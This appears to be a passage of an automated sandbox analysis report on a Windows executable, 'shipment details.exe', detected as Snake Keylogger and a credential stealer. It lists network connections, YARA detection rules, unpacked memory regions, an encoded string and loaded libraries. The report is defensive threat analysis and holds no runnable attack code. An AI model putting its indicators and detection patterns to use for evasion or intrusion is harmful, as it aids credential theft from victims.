              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 62359 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

              System Summary

              barindex
              Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
              Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\shipment details.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 0_2_00CFE5A40_2_00CFE5A4
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 0_2_00CFF4980_2_00CFF498
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 0_2_05E08BC00_2_05E08BC0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_013371181_2_01337118
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133C1471_2_0133C147
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133A0881_2_0133A088
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_013353621_2_01335362
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133D2781_2_0133D278
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133C4681_2_0133C468
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133C7381_2_0133C738
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_013369A01_2_013369A0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133E9881_2_0133E988
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133CA081_2_0133CA08
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133CCD81_2_0133CCD8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133CFAA1_2_0133CFAA
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133E97A1_2_0133E97A
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_0133F9601_2_0133F960
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_013339EE1_2_013339EE
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_013329EC1_2_013329EC
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_01333AA11_2_01333AA1
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_01333E091_2_01333E09
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD1E801_2_06BD1E80
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD17A01_2_06BD17A0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD9C701_2_06BD9C70
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDFC681_2_06BDFC68
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD95481_2_06BD9548
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD0B301_2_06BD0B30
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD50281_2_06BD5028
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD29681_2_06BD2968
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDE6B01_2_06BDE6B0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDE6AF1_2_06BDE6AF
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDDE001_2_06BDDE00
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD1E701_2_06BD1E70
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD178F1_2_06BD178F
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDEF601_2_06BDEF60
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDEF511_2_06BDEF51
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDCCA01_2_06BDCCA0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDCC8F1_2_06BDCC8F
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDDDFF1_2_06BDDDFF
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDD5501_2_06BDD550
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDD5401_2_06BDD540
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDEAF81_2_06BDEAF8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDE2581_2_06BDE258
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDE24A1_2_06BDE24A
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDF3B81_2_06BDF3B8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD8BA01_2_06BD8BA0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD8B911_2_06BD8B91
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD9BFB1_2_06BD9BFB
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD93281_2_06BD9328
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD0B201_2_06BD0B20
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDEB081_2_06BDEB08
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDD0F81_2_06BDD0F8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDD0E81_2_06BDD0E8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD50181_2_06BD5018
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDF8101_2_06BDF810
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD00061_2_06BD0006
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDF8021_2_06BDF802
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD00401_2_06BD0040
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDD9A81_2_06BDD9A8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BDD9991_2_06BDD999
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD295A1_2_06BD295A
              Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe
              Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
              Source: shipment details.exe, 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe
              Source: shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe
              Source: shipment details.exe, 00000000.00000000.2051525359.000000000079A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameShick.exe, vs shipment details.exe
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
              Source: shipment details.exe, 00000000.00000002.4519226318.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs shipment details.exe
              Source: shipment details.exe, 00000001.00000002.4518256105.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
              Source: shipment details.exe, 00000001.00000002.4518425391.0000000000DC7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs shipment details.exe
              Source: shipment details.exeBinary or memory string: OriginalFilenameShick.exe, vs shipment details.exe
              Source: shipment details.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.5420000.6.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
              Source: 0.2.shipment details.exe.5420000.6.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/3
              Source: C:\Users\user\Desktop\shipment details.exeMutant created: NULL
              Source: shipment details.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: shipment details.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\shipment details.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: shipment details.exeReversingLabs: Detection: 36%
              Source: unknownProcess created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"
              Source: C:\Users\user\Desktop\shipment details.exeProcess created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"
              Source: C:\Users\user\Desktop\shipment details.exeProcess created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: dhcpcsvc.dllJump to behavior
